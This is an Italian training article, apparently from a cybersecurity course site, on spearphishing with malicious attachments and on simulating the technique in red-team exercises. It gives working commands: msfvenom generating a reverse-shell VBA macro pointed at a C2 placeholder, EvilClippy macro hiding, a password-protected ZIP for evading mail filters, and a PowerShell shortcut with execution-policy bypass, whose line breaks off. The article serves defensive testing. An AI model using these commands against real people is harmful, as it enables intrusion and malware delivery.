Iscriviti al webinar gratuito del 12 Maggio per diventare Forensic Analyst! Scopri di più
Corso Ethical Hacker: accedi alla promozione fino al 30 Arile! Scopri di più
Lo spearphishing con allegato malevolo resta uno dei vettori di accesso iniziale più prolifici nel panorama delle minacce. A differenza del phishing massivo, questa tecnica prende di mira individui, organizzazioni o settori specifici attraverso email confezionate ad hoc, allegando file che — una volta aperti dalla vittima — eseguono payload malevoli o sfruttano vulnerabilità applicative. La tecnica si colloca nella tattica Initial Access (TA0001), cioè la fase in cui l'avversario conquista il primo punto d'appoggio nella rete bersaglio.
I numeri raccontano la scala del problema: 77 gruppi APT documentati, 55 famiglie malware distribuite con questo metodo, 9 campagne tracciate e 7 mitigazioni applicabili. I formati sfruttati spaziano da documenti Microsoft Office (Word, Excel, HWP) a file RTF, PDF, eseguibili mascherati, archivi ZIP e RAR protetti da password, file ISO, LNK, CHM e persino HTA. Gli attaccanti manipolano estensioni e icone per far apparire un eseguibile come un documento innocuo, e spesso forniscono istruzioni nella mail stessa su come aggirare le protezioni — inclusa la password per decomprimere un archivio cifrato, tecnica che elude i gateway di posta.
L'efficacia della tecnica dipende dall'interazione umana: l'apertura del file innesca una catena che tipicamente passa per l'esecuzione di macro, lo sfruttamento di una vulnerabilità del parser documentale o l'esecuzione diretta di un binario camuffato.
Per simulare questa tecnica in un esercizio red team servono due ingredienti: un payload credibile e un meccanismo di consegna controllato. Il punto di partenza è la generazione di un documento Office armato con macro VBA che esegua un beacon di ritorno.
Con Mythic (open source), si può generare un agente Apollo o HTTP in formato shellcode, da iniettare in un documento tramite macro. Il framework permette di personalizzare il profilo C2, rendendo il traffico simile a navigazione legittima. Per chi preferisce un approccio consolidato, Cobalt Strike (a pagamento) offre il modulo Artifact Kit per generare payload in formato HTA, VBA macro o DLL, da incorporare in documenti Office.
La creazione del documento armato può avvenire con diversi approcci. Utilizzando msfvenom (open source, parte di Metasploit Framework) si genera un payload VBA:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<IP_C2> LPORT=443 -f vba-psh -o macro.vba
Il codice risultante va incollato nell'editor macro di un documento Word salvato in formato .docm o .doc. Per un approccio più sofisticato, EvilClippy (open source) permette di nascondere le macro VBA dalla visualizzazione dell'editor, rendendo il documento più evasivo all'analisi manuale:
EvilClippy.exe -s hidden_macro.vba documento.docm
Per simulare la variante con archivio protetto da password — tattica utilizzata da gruppi come Cobalt Group, DarkHydrus e BlackTech — basta impacchettare il payload in un archivio ZIP o RAR cifrato e includere la password nel corpo dell'email. Su Linux:
zip -P "invoice2024" payload.zip documento_armato.docm
La fase di consegna in laboratorio si gestisce con GoPhish (open source), che consente di creare campagne di phishing realistiche con tracking di apertura, click e download. Si configura un template email che replica comunicazioni aziendali, si allega il documento malevolo e si traccia quali utenti aprono il file.
Per testare la variante con file LNK — vettore usato da Gamaredon Group e Silence — si può usare LNKUp (open source) per generare file di collegamento che eseguano comandi PowerShell all'apertura. L'alternativa è creare LNK malevoli tramite PowerShell nativo:
$s = New-Object -ComObject WScript.Shell; $l = $s.CreateShortcut("report.lnk"); $l.TargetPath = "powershell.exe"; $l.Arguments = "-ep bypass -f \
Infine, per validare la resilienza dell'ambiente, è utile testare con file in formati multipli — .docm, .xlsm, .hta, .chm, .iso — e verificare quali passano i filtri del gateway di posta. Il framework Atomic Red Team (open source) include test specifici per T1566.001 che automatizzano parte di queste verifiche.
Scarica la guida gratuita e segui il percorso corretto fin dal primo passo